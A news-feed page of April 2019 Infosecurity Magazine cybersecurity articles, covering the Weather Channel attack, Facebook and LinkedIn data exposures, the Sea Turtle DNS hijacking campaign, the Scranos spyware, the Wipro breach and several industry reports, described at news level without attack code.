Cyber Risk News

Cyber-Attack Knocks the Weather Channel Off the Air

Info Security - Fri, 04/19/2019 - 14:31
Cyber-Attack Knocks the Weather Channel Off the Air

The Weather Channel, based in Atlanta, Georgia, has been hit with a cyber-attack that knocked it off the air for 90 minutes. 

On April 18, 2019, the organization took to its Twitter channel to confirm that it had been hit by a "malicious software attack" on its network but as of press time hasn't released any specifics on the attack itself. When the AMHQ show should have started, viewers saw taped programming, Heavy Rescue. AMHQ's Twitter feed also confirmed that it was "experiencing technical difficulties." 

Around 90 minutes later, the show returned with its anchors informing of the cyber incident.

"The Weather Channel, sadly, has been the victim of a malicious software attack today," said anchor Jim Cantore.

"Yes, and it has affected our ability to bring you your weather information," added anchor Stephanie Abrams. "So we just wanted to say thank you again for your patience and we want to get right to today's severe weather."

While attacks on television networks do not always make mainstream news, many countries have fallen victim to them. In February 2018, a cyber-attack on the PyeongChang Olympic Games, attributed to Russia, took the official Olympic website offline for 12 hours and disrupted Wi-Fi and televisions at the PyeongChang Olympic stadium.

Also, in October 2018, the National Cyber Security Centre accused Russia's military intelligence services of targeting firms in Russia and Ukraine, the US Democratic Party and a small TV network in the UK.

Categories: Cyber Risk News

Facebook Uploaded 1.5 Million Email Contacts Without Consent

Info Security - Fri, 04/19/2019 - 14:07
Facebook Uploaded 1.5 Million Email Contacts Without Consent

Since 2016, Facebook has reportedly harvested email contacts of 1.5 million users without their consent. According to Business Insider, the media outlet that broke the story, the company had been collecting the contact lists of new users since May 2016. 

In a statement, Facebook confirmed that it had been unintentionally uploading this data when people were verifying their accounts. 

"Last month we stopped offering email password verification as an option for people verifying their account when signing up for Facebook for the first time," said the statement. "When we looked into the steps people were going through to verify their accounts we found that in some cases people's email contacts were also unintentionally uploaded to Facebook when they created their account.

"We estimate that up to 1.5 million people's email contacts may have been uploaded. These contacts were not shared with anyone and we're deleting them. We've fixed the underlying issue and are notifying people whose contacts were imported. People can also review and manage the contacts they share with Facebook in their settings."

According to Business Insider, a security researcher realized that Facebook was asking some users to "enter their email passwords when they signed up for new accounts to verify their identities." The outlet then discovered that when a user entered their email password, "a message popped up saying it was 'importing' contacts, without asking for permission first."

A Facebook spokesperson also confirmed that these contacts were uploaded into Facebook's systems, where they were used to build "Facebook's web of social connections" and recommend friends. 

It's not known if these contacts were also used for ad-targeting purposes, similar to that of the Cambridge Analytica scandal that happened last year. The exposé, which was released by The Observer, had led to Facebook having to answer questions to the US Senate and the UK government. 

Infosecurity Magazine reported that at the beginning of April, over half a billion personal Facebook records were publicly exposed to the internet by two third-party app developers. UpGuard claimed to have found the two datasets stored in Amazon S3 buckets, which were configured to allow public download of files.

“The data exposed in each of these sets would not exist without Facebook, yet these data sets are no longer under Facebook’s control. In each case, the Facebook platform facilitated the collection of data about individuals and its transfer to third parties, who became responsible for its security,” explained UpGuard.

In regards to the latest data mishap, Facebook plans to notify the 1.5 million users affected and delete their contacts from the company's systems.

Categories: Cyber Risk News

LinkedIn Data Found in Unsecured Databases

Info Security - Thu, 04/18/2019 - 17:44
LinkedIn Data Found in Unsecured Databases

A security researcher identified eight unsecured databases that held "approximately 60 million records of LinkedIn user information."

GDI Foundation, where the security researcher is from, is a nonprofit organization with a mission to "defend the free and open Internet by trying to make it safer." The researcher, Sanyam Jain, contacted Bleeding Computer when he noticed "something strange." He was seeing unsecured databases containing the LinkedIn data "appearing and disappearing from the Internet under different IP addresses."

While the majority of the LinkedIn data was reportedly public, some of the data contained email addresses.

"According to my analysis the data has been removed every day and loaded on another IP. After some time the database becomes either inaccessible or I can no longer connect to the particular IP, which makes me think it was secured. It is very strange," Jain told Bleeding Computer. The total size of all of the databases was 229 GB, with each database ranging between 25 GB to 32 GB. 

As an experiment, Bleeding Computer editor Lawrence Abrams asked Jain pull his record from one of the databases and review it. According to the article, Abrams found the data contained in the record included "his LinkedIn profile information, including IDs, profile URLs, work history, education history, location, listed skills, other social profiles, and the last time the profile was updated." 

The email address Abrams used when he registered his LinkedIn account was also included. The editor doesn't know how the information got onto this database as he "always had the LinkedIn privacy setting configured to not publicly display his email address."

Each profile also contains what appears to be internal values that describe the type of LinkedIn subscription the user has and whether they utilize a particular email provider, according to Bleeding Computer. These values were labeled "isProfessional," "isPersonal," "isGmail," "isHotmail" and "isOutlook."

Bleeding Computer contacted Amazon, who was hosting the databases, and as of April 15, 2019, the databases were secured and were no longer accessible via the internet.

LinkedIn's Paul Rockwell, head of trust and safety, told the website: "We are aware of claims of a scraped LinkedIn database. Our investigation indicates that a third-party company exposed a set of data aggregated from LinkedIn public profiles, as well as other, non-LinkedIn sources. We have no indication that LinkedIn has been breached."

LinkedIn also told the outlet that in some cases an email address could be public and provided a link to a privacy page that allows users to configure who can see a profile's email address.

Categories: Cyber Risk News

TA505 Targets Financial and Retail Using 'Undetectable' Methods

Info Security - Thu, 04/18/2019 - 17:00
TA505 Targets Financial and Retail Using 'Undetectable' Methods

A financially motivated gang is targeting retailers and financial institutions around the world using remote access software. 

CyberInt's Research Lab has found that TA505 is using tactics and an off-the-shelf commercial remote administration tool, developed by Russian-based company TektonIT. The group was behind attacks on the global financial industry between December 2018 and February 2019 and is using the same techniques, according to the company. 

Proofpoint says that according to its actor profile, "TA505 is responsible for the largest malicious spam campaigns we have ever observed, distributing instances of the Dridex banking Trojan, Locky ransomware, Jaff ransomware, The Trick banking Trojan and several others in very high volumes."

"Although they are using phishing and social engineering to get the software into the organisations, once its installed, it’s virtually undetectable by traditional threat protection systems because it’s legitimate software,” says Adi Peretz, senior strategic consultant and head of research at CyberInt. “They are still very much active and this is only the beginning of our deep-dive investigation.”

According to the report, TA505 tried its hand at payloads such as stealing back doors and remote access Trojans following the decline in the popularity of ransomware, likely due to mitigation tactics. However, the illegitimate software is throwing others off the scent and making the group undetectable. 

"Tried and tested attack patterns appear to be consistent across these recently observed campaigns and commence with the delivery of phishing emails that have lure document attachments," says the CyberInt report. "Utilising legitimate logos, language and terminology consistent with common business interactions or the target organization, the email encourages the potential victim to open the lure document attachment which in turn instructs them to disable security controls within Microsoft Office to allow a nefarious macro to be executed."

The report goes on to say that if the macro, if executed, subsequently attempts to download "malicious payloads from the threat actor’s C2 infrastructure that in most cases also masquerades as, or mimics, legitimate-looking domains such as using names and misspellings related to ‘Cloud’, ‘Microsoft Office 365’ or ‘Security.’"

Categories: Cyber Risk News

Fraudsters Exploit Sympathies Surrounding Notre Dame Tragedy

Info Security - Thu, 04/18/2019 - 16:22
Fraudsters Exploit Sympathies Surrounding Notre Dame Tragedy

Fraudsters are preying on the goodwill of people everywhere by using the tragic fire of Notre Dame to their advantage.

According to research by security company ZeroFOX, cyber-criminals are "spreading misinformation about the disaster," which includes fake donation pages and launching new phishing campaigns. The company says in a blog post that "preying on the sympathy of those wanting to help victims is nothing new, but the technical underpinnings of the internet and its social media platforms allow hackers and spammers to scale their efforts at an unprecedented rate."

The blog goes onto explain that these threat actors use a variety of tactics, such as: 

  • Using bots on Twitter to spread donation links leading to spam or malware sites
  • Impersonating websites and social media accounts of legitimate charity organizations
  • Sending fraudulent charity emails with bad links or attachments
  • Registering domains related to the disaster
  • Creating fake donation campaigns on crowdfunding sites
  • Using fraud messaging that includes vague victim stories, pressure to act quickly or promises of high payouts for a company involved in cleanup

Most worryingly, the crowdfunding tactics might work more than anything else. There is a rise of raising money this way for help people in need, especially around tragic events such as this. Sites such as JustGiving might be copied to set up fake donation sites. "People looking to donate quickly may easily mistake a fraudulent donation page for the real page – losing their money and putting money in the hands of bad actors, not those in need," says the blog post. 

One example the ZeroFox Alpha Team found was on, where an anonymous user created this crowdfunding campaign supporting “Friends of Notre-Dame De Paris Inc.” "Based on the information provided (and lack of details) in the post, any supporter should be hesitant to donate to this particular fundraising effort," the post goes on to say. 

Another tactic targets social media users who follow trending hashtags. 

"In the case of the Notre Dame disaster, we have seen multiple instances of posters using the hashtag #NotreDameCathedralFire looking to capitalize on the tragedy," explains the post.

"[This example of one such post] is looking to sell 'services' using the Notre Dame fire hashtag." Users need to be be careful, it goes on, of any seller using hijacked hashtags, as they are "typically associated with scams and malicious links."

Example of potential crowdfunding scam – note the warning signs.

When it comes to avoiding scams related to this disaster, ZeroFOX recommends the following:

  • Review suggestions from crowdfunding sites on how to identify legitimate campaigns.
  • Be cautious of unfamiliar individuals or organizations soliciting donations or investments through social media, email or phone.
  • Conduct thorough research on charity organizations and use a website that rates organizations, such as Charity Navigator or CharityWatch.
  • Be cautious of requests for donations or investments in cash, by gift card, or by wiring money, which are frequent methods of payment for scams.
  • Report potential scams to crowdfunding sites, and reach out for a potential refund in the case of a suspected scam.
Categories: Cyber Risk News

Cloud Security Spending Set to Top $12bn by 2023

Info Security - Thu, 04/18/2019 - 10:20
Cloud Security Spending Set to Top $12bn by 2023

Global spending on cloud security is set to grow nearly 18% to reach $12.7bn by 2023, with protection for public cloud deployments prioritized over the coming years, according to a new report from Forrester.

Organizations spent $178bn on public cloud services last year, a figure that will grow to $236bn by 2020 — making security increasingly important to protect mission critical systems and sensitive data.

Infrastructure decision makers are particularly concerned about cyber risk, with over half (54%) implementing cloud solutions, the analyst claimed in its report, Forrester Analytics: Cloud Security Solutions Forecast, 2018 To 2023 (Global).

The sheer complexity of cloud deployments, often covering multiple providers and hybrid deployments, also requires enhanced security to monitor data, detect anomalies, and intercept threats.

Public cloud remains the biggest focus for security investment. Some $4bn was spent on public cloud native platform security in 2018, accounting for over 70% of total cloud security spend and this will be the fastest-growth area to 2023, when it will reach $9.7bn, Forrester claimed

The good news is that these efforts appear to be working: just 12% of breaches targeted public cloud environments, while 37% of global infrastructure decision makers cited improved security as an important reason to move to the public cloud, according to Forrester.

The analyst was also keen to point out that there’s no single solution which can meet all an organization’s cloud security needs.

As mentioned, public cloud native solutions are growing fastest. These cover areas like: data classification, categorization and segmentation; server access control; user IAM; encryption; and logging, auditing, and anomaly detection.

Then there are cloud workload solutions designed to centralize and automate cloud security across multiple platforms and environments. This market is set to grow at 17.3% CAGR to reach $1.9bn by 2023.

Finally, cloud security gateways succeed where traditional security tools fail by encrypting data before it’s sent to SaaS applications; detecting shadow IT; data loss prevention (DLP); malware detection; and cloud access anomaly detection.

Categories: Cyber Risk News

Dark Web Fraudsters Defraud Each Other with Fraud Guides

Info Security - Thu, 04/18/2019 - 09:43
Dark Web Fraudsters Defraud Each Other with Fraud Guides

Cyber-criminals are doing a roaring trade in “how-to” fraud guides for their fellow scammers, although many are out-of-date and incomplete, according to new dark web research from Terbium Labs.

The cyber-intelligence firm analyzed nearly 30,000 of these guides to compile its latest report, Fraud Guides 101: Dark Web Lessons on How to Defraud Companies and Exploit Data.

These online documents typically include instructions on specific fraud capabilities such as account takeover, phishing, cashing out, doxing, synthetic fraud, account creation and so on.

They could feature instructions, personal notes from the author on their experiences of what works and what doesn’t, social engineering and technical advice, and more.

However, while it appears to be an ominously thriving industry, it’s unclear exactly how much value these guides are offering to the typical fraudster.  

According to Terbium Labs, over a quarter (26%) of guides are more than a decade old, and there are more out there from 2010 than 2017 and 2018 combined.

“Any guidance or information from within a few years is bound to still be helpful for criminals looking to get started, but once we get five or 10 years out, the value certainly decreases,” Terbium Labs VP of research, Emily Wilson, told Infosecurity.

“If buyers think they’re getting the most up-to-date methods in these major fraud collections, they’re going to be surprised and disappointed. These collections represent the information gathered over a couple of decades, rather than a highly curated group of the most recent materials.”

What’s more, three-quarters (75%) of those analyzed were found to be duplicates which have simply been repackaged and resold, at an average of £6 each.

“What we see here is a criminal community gathering information over time, and then doing what vendors do best: repackaging it and reselling it under their own name, looking for a new way to turn a profit,” Wilson continued.

“These guides require little work to gather, and even less work to throw into a zip file and market under your own brand. They’re in business to make money, and what better way to make money than to repackage someone else’s work and pass it off as your own?”

In addition, some 11% of fraud guide purchases the researchers attempted to make on the dark web turned out to be scams, the report revealed.

However, despite all the scams and the old and incomplete data found in many guides, the info gathered by the dark web intelligence vendor could still be useful for organizations trying to get inside the fraudster’s head. It could even be used by risk teams to help evaluate current fraud controls and detection services, for example.

Terbium Labs also ran a check on the appearance of personal and financial information in the guides to see what was of greatest interest to fraudsters.

Surprisingly, email addresses came out top, ahead of payment card data and other PII, according to the report.

Categories: Cyber Risk News

DNS Hijackers Target Middle East Governments

Info Security - Thu, 04/18/2019 - 09:06
DNS Hijackers Target Middle East Governments

Security experts are warning of a new state-sponsored DNS hijacking campaign affecting at least 40 organizations across 13 countries.

Cisco Talos revealed in a blog post yesterday that the “Sea Turtle” campaign began back in January 2017 and has been active until the first quarter of this year, targeting mainly public and private sector organizations in the Middle East and North Africa.

Attackers sought first to gain DNS credentials from target organizations, either by exploiting known vulnerabilities or sending spear-phishing emails. They then typically used these log-ins to target the firm’s registrar, accessing their DNS records and modifying them to point users to a malicious server under the hackers’ control.

The group then set-up a classic man-in-the-middle (MiTM) operation, impersonating legitimate services to harvest user credentials.

“Once these credentials were captured, the user would then be passed to the legitimate service. To evade detection, the actors performed ‘certificate impersonation,’ a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization,” explained Cisco.

“This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected "SSL padlock" in the URL bar.”

With access to the target’s network, the attackers then stole the organization’s SSL certificate, enabling them to perform more MiTM attacks to harvest other credentials, expanding their access. Stolen certs were used for just a day to maintain good OpSec.

Primary targets were military organizations, national security agencies, foreign affairs ministries and energy companies in Libya, Egypt, UAE, Cyprus, Lebanon, Iraq, Jordan, Turkey, Armenia, Syria and Albania.

Secondary targets, infiltrated to gain access to the former, were mainly based in the US and Sweden and included DNS infrastructure firms such as registrars, ISPs, telcos, and one registry. Swedish DNS firm Netnod was one of these.

“Notably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on IANA for the ccTLD .am,” Cisco continued. “Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs.”

The firm warned that the group is highly capable and has continued in its operations, undeterred by media reports on some of its activity.

“Most traditional security products such as IDS and IPS systems are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought. Had more ccTLDs implemented security features such as registrar locks, attackers would be unable to redirect the targeted domains,” it concluded.

“The threat actors also used an interesting techniques called certificate impersonation. This technique was successful in part because the SSL certificates were created to provide confidentiality, not integrity. The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network.”

Cath Goulding, head of cybersecurity at .uk registry Nominet, claimed its infrastructure was secure thanks to it taking a layered approach.

“While two-factor authentication helps verify authenticity, Domain Lock is a tool by which registrars can literally ‘lock’ domains so that no changes can be made without thorough authentication of the domain name owner via 2FA. We are continually monitoring the situation, and would reassure the majority of consumers trying to access .UK domain names,” she said.

“For businesses that have their own DNS provisions, we would recommend checking your DNS settings manually to ensure they are still pointing to legitimate servers. The issue with this sort of attack is that it’s incredibly difficult to spot. We would recommend implementing stringent access protocols for your DNS settings, such as multi-factor authentication, as this additional layer of security makes it much harder for hackers to gain access to your systems.”

The group is not connected to the DNSpionage attacks revealed in November last year, according to Cisco.

Categories: Cyber Risk News

DCMS Shares UK Journalists Emails, Potential GDPR Breach

Info Security - Wed, 04/17/2019 - 16:28
DCMS Shares UK Journalists Emails, Potential GDPR Breach

The government department that is responsible for implementing the General Data Protection Regulation (GDPR) has committed an email faux pas with UK journalists which could also mean it has broken its own rules. 

Flagged by Guardian journalist Alex Hern on Twitter, the email was regarding its announcement on age verification rules on online pornography. Hern tweeted: "DCMS has just announced that the porn filters are coming online on July 15, in an email that cc's every media and technology journalist in Britain." 

According to the Information Commissioner's Office (ICO)'s website, "The GDPR applies wherever you are processing ‘personal data.' If the email addresses make obvious the name, such as ',' GDPR will apply."

Furthermore, the GDPR protects people from being cold-emailed or spammed requiring explicit consent from individuals. If anyone on the mailing list didn't consent to being on it, there might be a breach.

What counts as consent?

  • Consent must be freely given; this means giving people genuine ongoing choice and control over how you use their data
  • Consent should be obvious and require a positive action to opt in. Consent requests must be prominent, unbundled from other terms and conditions, concise and easy to understand, and user-friendly
  • Consent must specifically cover the controller’s name, the purposes of the processing and the types of processing activity
  • You must make it easy for people to withdraw consent at any time they choose

While DCMS is a high-profile organization, breaches due to human error are not uncommon. In the last two years of reports of UK data breaches to the ICO, just 12% were the result of malicious attacks, according to Kroll. This means that 88% were the result of human error.

"Effective cybersecurity is not just about technology. Often, companies buy the latest software to protect themselves from hackers, but fail to instigate the data management processes and education of employees required to mitigate the risks," said Kroll managing director, Andrew Beckett, to Infosecurity Magazine in September 2018. "The majority of data breaches, and even many cyber-attacks, could be prevented by human vigilance or the implementation of relatively simple security procedures."

The ICO confirmed it was aware of the incident, commenting: "We are in contact with the Department for Digital, Culture, Media and Sport regarding today’s email incident."

Categories: Cyber Risk News

UK To Become First Country To Bring in Age-Verification for Online Pornography

Info Security - Wed, 04/17/2019 - 14:53
UK To Become First Country To Bring in Age-Verification for Online Pornography

The UK will become "the first country in the world" to bring in age verification for online pornography, according to the Department for Digital, Culture, Media and Sport (DCMS). The measures, which come into force on July 15, 2019, mean that commercial providers of online pornography will be required by law to carry out robust age-verification checks on users to ensure they are 18 or over.

In its announcement this morning, the DCMS says "the move is backed by 88% of UK parents with children aged 7–17, who agree there should be robust age-verification controls in place to stop children seeing pornography online." It has also said that websites that fail to implement age-verification technology face having payment services withdrawn or being blocked for UK users.

Minister for digital Margot James said, "Adult content is currently far too easy for children to access online. The introduction of mandatory age-verification is a world-first, and we’ve taken the time to balance privacy concerns with the need to protect children from inappropriate content. We want the UK to be the safest place in the world to be online, and these new laws will help us achieve this."

The change in law is part of the government’s commitment to making the UK "the safest place in the world to be online, especially for children." It follows the publication of a whitepaper by the government department last week, which also referenced social media companies being more accountable for content on their sites.

The British Board of Film Classification (BBFC) will be responsible for ensuring compliance with the new laws.

Online pornography websites have also been a goldmine for stealing user credentials. In 2018, 850,000 attempts were made to steal porn credentials according to a report by Kaspersky Labs. The attacks had been focused on paid accounts for only two sites, Pornhub and XNXX.

Ransomware has also affected users of these sites, making underage users vulnerable. According to Kaspersky's report, ransomware poses as an application. Once in use it locks the screen of the device and shows a message stating that illegal content (usually child porn) has been detected on the device, and the device has been locked. In order to unlock the device, the victim has to pay a ransom.

Categories: Cyber Risk News

Scranos Goes Global After Targeting China

Info Security - Wed, 04/17/2019 - 14:04
Scranos Goes Global After Targeting China

A new password and data stealing operation that has been targeting China has started to infect users worldwide, according to Bitdefender Cyber Threat Intelligence Lab. 

Using a rootkit driver, which is believed to have been a possibly stolen certificate, the attack is still a work in progress with many components in the early stage of development, say the researchers behind the company's latest report, Inside Scranos – A Cross Platform, Rootkit-Enabled Spyware Operation.

"We discovered that the operators of this rootkit-enabled spyware are continuously testing new components on already-infected users and regularly making minor improvement to old components," according to the report. "The various components can serve different purposes or take different approaches to achieve their goals."

Some of these components identified include:

  • Extract cookies and steal login credentials from Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex Browser
  • Steal a user’s payment accounts from Facebook, Amazon and Airbnb webpages
  • Send friend requests to other accounts, from the user’s Facebook account
  • Send phishing messages to the victim’s Facebook friends containing malicious APKs used to infect Android users as well
  • Steal login credentials for the user’s account on Steam

Bitdefender's research reveals that the malware spreads via Trojanized applications "disguised as cracked software, or applications posing as legitimate software such as e-book readers, video players, drivers or even antimalware products." When executed, the rootkit driver is installed to cloak the malware and ensure persistence. The malware then phones home and is told what other components to download and install.

"Our telemetry shows the adware has a global presence, but it seems more prevalent in India, Romania, Brazil, France, Italy and Indonesia," continues the report. "All identified samples confirm that this operation is in a consolidation stage: the oldest samples identified date back to November 2018, with a massive spike in December and January. However, in March 2019, the command and control servers started pushing other strains of malware – a clear indicator that the network is now affiliated with third parties in pay-per-install schemes."

The rootkit driver, at the time the report was written, contains a valid digital signature with a certificate issued to Yun Yu Health Management Consulting (Shanghai) Co., Ltd.

"The most likely scenario is that an impersonator obtained this certificate fraudulently, even if the company is not a software vendor," the report deduces. 

The rootkit sets up and creates a device named \Device\VideoDriver and serves three main purposes, according to the report:

  1. Decrypts and injects the downloader in a svchost.exe process with system authority
  2. Deletes a specified file using low-level file system operations
  3. Registers an IRP_MJ_SHUTDOWN function which is used to ensure the persistence of this rootkit in the infected system by rewriting itself on disk and in the registry at every shutdown, in case it was deleted

Categories: Cyber Risk News

'Data trusts' can support competing interests, studies find - Wed, 04/17/2019 - 13:15
The conflicting interests different organisations have in using information can be managed through 'data trust' models, the Open Data Institute (ODI) has said at the end of a piloting scheme.
Categories: Cyber Risk News

Fifth of Web Traffic Comes from Malicious Bots

Info Security - Wed, 04/17/2019 - 09:43
Fifth of Web Traffic Comes from Malicious Bots

Around a fifth of all web traffic last year was linked to malicious bot activity, with financial services hit more than any other sector, according to Distil Networks.

The security vendor compiled its 2019 Bad Bot Report from analysis of a global network covering thousands of anonymized domains.

It claimed to have discovered hundreds of billions of “bad bot” requests across this network, enabling large-scale, automated malicious activity including: web scraping, competitive data mining, personal and financial data harvesting, brute-force login and digital ad fraud, spam, transaction fraud and more.

The report revealed 20.4% of traffic to be linked to this kind of activity. Although this was a slight drop from last year, nearly three-quarters (74%) of these bots are classified as “Advanced Persistent Bots” (APBs) which are able “to cycle through random IP addresses, enter through anonymous proxies, change their identities, and mimic human behavior.”

In terms of ISPs, bad bot traffic was most likely to originate from Amazon (18%), while geographically, most traffic originated in the US (53%), according to the report. However Russia and Ukraine accounted for nearly half (48%) of blocking requests from Distil customers, given their notoriety.

Financial services had the highest percentage of malicious bot traffic (42%) thanks mainly to the uptick in credential stuffing designed to access and/or hijack user accounts. Between May and December 2018 Akamai tracked over a billion credential stuffing attempts on financial services firms.

However, ticketing (39%), education (38%) and government sectors (30%) were also badly affected. Government is unusual in that the motivations of attackers in this sector are not solely driven by financial gain, but also election (voter registration account) interference.

“Bot operators and bot defenders are playing an incessant game of cat and mouse, and techniques used today, such as mimicking mouse movements, are more human-like than ever before,” said Tiffany Olson Kleemann, CEO of Distil Networks.

“As sophistication strengthens, so too does the breadth of industries impacted by bad bots. While bot activity on industries like airlines and ticketing are well-documented, no organization — large or small, public or private — is immune. When critical online activity, like voter registration, can be compromised as a result of bad bot activity, it no longer becomes a challenge to tackle tomorrow. Now is the time to understand what bots are capable of and now is the time to act.”

Categories: Cyber Risk News

EU: We Have No Evidence Kaspersky Lab is Security Risk

Info Security - Wed, 04/17/2019 - 09:35
EU: We Have No Evidence Kaspersky Lab is Security Risk

The European Commission has admitted it has no evidence that Kaspersky Lab products are a national security risk to member states, despite the European Parliament voting last summer for a ban on the Russian AV company.

The revelations come in response to a question from right-wing European Parliament member (MEP), Gerolf Annemans.

It refers to the non-binding resolution, passed on June 13 2018, which branded Kaspersky Lab as ‘malicious’ and ‘dangerous.’

“Does the Commission know of any reason other than certain press articles that justifies the labelling of Kaspersky as ‘dangerous’ or ‘malicious,” especially since Member States such as Germany, France and Belgium do not perceive any problems with cooperation with the firm concerned?” he asked.

The Belgian MEP also asked whether the Commission is aware “of any reports or opinions of cyber-experts or consultancies about Kaspersky Lab, and can it give me references to them?”

In response, the Commission said it is “not in possession of any evidence regarding potential issues related to the use of Kaspersky Lab products,” and that “it did not commission any reports” into the issue to find out more.

“The Commission is following closely debates and developments concerning the security of IT products and devices in general, including discussions about potential measures related to access to the EU market,” it added.

“The EU is an open market, which can be accessed by foreign companies in compliance with EU rules. In addition, Member States have the competence to decide whether to exclude companies from their markets for national security reasons.”

That would seem to suggest that too much weight was given to US moves to ban the Moscow-based vendor at the time of the vote, despite it not being able to produce any proof to back up its claims of the firm being a national security risk. The UK also issued a warning in December 2017 for agencies not to use its products for processing information classified SECRET and above.

The European Parliament motion in question was framed in general terms about cyber-defense, yet only Kaspersky Lab was named, adding weight to the notion that it was unfairly singled out.

It’s unclear why it took so long to gain clarification from the Commission on this.

Categories: Cyber Risk News

Wipro Confirms Major Breach Investigation

Info Security - Wed, 04/17/2019 - 08:45
Wipro Confirms Major Breach Investigation

IT services giant Wipro has revealed it is investigating a potential intrusion after a report named the firm as suffering an attack targeting a dozen customers,

India’s third largest IT outsourcer claimed to have spotted “potentially abnormal activity in a few employee accounts” after an “advanced phishing campaign” targeted the company.

“Upon learning of the incident, we promptly began an investigation, identified the affected users and took remedial steps to contain and mitigate any potential impact,” it continued, according to ETtech.

“We are leveraging our industry-leading cybersecurity practices and collaborating with our partner ecosystem to collect and monitor advanced threat intelligence for enhancing security posture. We have also retained a well-respected, independent forensic firm to assist us in the investigation. We continue to monitor our enterprise and infrastructure at a heightened level of alertness.”

Security researcher Brian Krebs originally reported the incident, citing multiple unnamed sources who claimed a multi-month intrusion had taken place, with at least 11 or 12 customers affected.

One claimed to know this info from the forensics investigation in which folder names on the intruders’ back-end were found to have been named after those clients.

Another source claimed that Wipro is being forced to build a new private email network, as the current one was apparently no match for the assumed state-sponsored attackers.

IT services companies are a major target for hackers given the privileged access they can grant to large numbers of client networks.

Chinese state-sponsored attack group APT10 was called out in 2017 after a long-running campaign against MSPs described by British investigators as “one of the largest ever sustained global cyber-espionage campaigns.”

IOActive CTO, Cesar Cerrudo, argued the case is another example of how modern digital supply chains create extra risk for organizations.

“These types of attacks are incredibly difficult to defend against, as trust is an essential part of any partnership. However, companies should be careful to ensure that they have the right controls in place to ensure that even if a hacker does gain access to an employee's credentials, this doesn’t mean they have the keys to the kingdom,” he added.

“If an organization isn't looking for security risks, then a threat actor doesn't need to launch a costly, complex or high-risk supply chain attack to compromise the organization. If the worst happens, and systems are compromised, then having a swift and effective response is essential. Organizations need to be sure they are able to identify the compromise fast (ideally before customers are impacted) and that they can quickly assert which customers may have been impacted and notify them of the potential risk to stop things from spiralling down the supply chain.”

Categories: Cyber Risk News

Almost a Quarter of Orgs Don’t Run Security Checks on Products

Info Security - Wed, 04/17/2019 - 08:35
Almost a Quarter of Orgs Don’t Run Security Checks on Products

A new study from Outpost24 has discovered that almost one in four (23%) organizations do not carry out any form of security testing on their products before they are launched into the market.

The cyber-assessment firm surveyed 121 security professionals at RSA Conference 2019, unearthing a worrying trend whereby application security appears to be taking a back seat in a number of product-producing companies.

In fact, Outpost24 found that 31% of respondents admitted that their organization had knowingly marketed a product with security vulnerabilities just to beat competition, and that 44% of organizations do not introduce security into the app development cycle from the beginning. Only 56% of respondents were sure their company carried out security testing on products before going to market.

“These figures raise concerns about the priority that organizations are placing on security, especially when attempting to beat competition by rushing products to market”, said Bob Egner, VP of Outpost24. “What many of the respondents are clearly forgetting is the damage security vulnerabilities can not only do to an organization’s customers, but also to brand and reputation. If a company ships products which are notoriously flawed with security vulnerabilities then they will not keep their customers for long and may ultimately face legal issues. The value of beating competition can be lost or even reversed.”

Any organization that is developing and marketing products should look to build security into the design stage, Egner added, as the cost to correct them is documented to be smaller at an early stage of the development process. “Taking a secure by design approach will mean security is built into the foundations of a product and will limit the cyber risks faced by users, which will ultimately increase customer satisfaction as well.”

Categories: Cyber Risk News

Almost a Quarter of Orgs Don’t Run Security Checks on Products

Info Security - Wed, 04/17/2019 - 08:35
Almost a Quarter of Orgs Don’t Run Security Checks on Products

A new study from Outpost24 has discovered that almost one in four (23%) organizations do not carry out any form of security testing on their products before they are launched into the market.

The cyber-assessment firm surveyed 121 security professionals at RSA Conference 2019, unearthing a worrying trend whereby application security appears to be taking a back seat in a number of product-producing companies.

In fact, Outpost24 found that 31% of respondents admitted that their organization had knowingly marketed a product with security vulnerabilities just to beat competition, and that 44% of organizations do not introduce security into the app development cycle from the beginning. Only 56% of respondents were sure their company carried out security testing on products before going to market.

“These figures raise concerns about the priority that organizations are placing on security, especially when attempting to beat competition by rushing products to market”, said Bob Egner, VP of Outpost24. “What many of the respondents are clearly forgetting is the damage security vulnerabilities can not only do to an organization’s customers, but also to brand and reputation. If a company ships products which are notoriously flawed with security vulnerabilities then they will not keep their customers for long and may ultimately face legal issues. The value of beating competition can be lost or even reversed.”

Any organization that is developing and marketing products should look to build security into the design stage, Egner added, as the cost to correct them is documented to be smaller at an early stage of the development process. “Taking a secure by design approach will mean security is built into the foundations of a product and will limit the cyber risks faced by users, which will ultimately increase customer satisfaction as well.”

Categories: Cyber Risk News

Spear-Phishing Campaign Targeted Ukrainian Government as Early as 2014

Info Security - Tue, 04/16/2019 - 14:54
Spear-Phishing Campaign Targeted Ukrainian Government as Early as 2014

A spear-phishing email campaign targeting government entities in Ukraine could have been active as early as 2014, according to FireEye.

In a blog post published on April 16, 2019, FireEye Threat Intelligence found the latest spear-phishing email in early 2019, which included a "malicious LNK file" with PowerShell script to download the second-stage payload from the command-and-control (C&C) server. The email was received by military departments in Ukraine and included lure content related to the sale of demining machines.

According to FireEye, "This latest activity is a continuation of spear phishing that targeted the Ukrainian Government as early as 2014." The company also wrote that the infrastructure analysis indicated the actors behind the intrusion activity may be associated with the so-called Luhansk People's Republic (LPR).

The email, sent on January 22, 2019, used the subject "SPEC-20T-MK2-000-ISS-4.10-09-2018-STANDARD," and the sender was forged as Armtrac, a defense manufacturer in the United Kingdom. An attachment included a 7z package with two benign documents and a one malicious LNK file.

"Compilation times indicate that this actor, who focused primarily on Ukraine, may have been active since at least 2014," the blog post says. "Their activity was first reported by FireEye Threat Intelligence in early 2018. They gradually increased in sophistication and leveraged both custom and open-source malware."

Ukraine legislation describes so-called LPR as "temporarily occupied territory" and its government as an "occupying administration of the Russian Federation," according to FireEye. 

"While cyber-espionage is regularly leveraged as a tool of state power, this capability is not limited to states," said John Hultquist, director of analysis, FireEye. "Just as new state actors are consistently drawn to this practice, many sub-state actors will inevitably develop capabilities as well, especially those with the resources of a state sponsor or nominal control of territory.

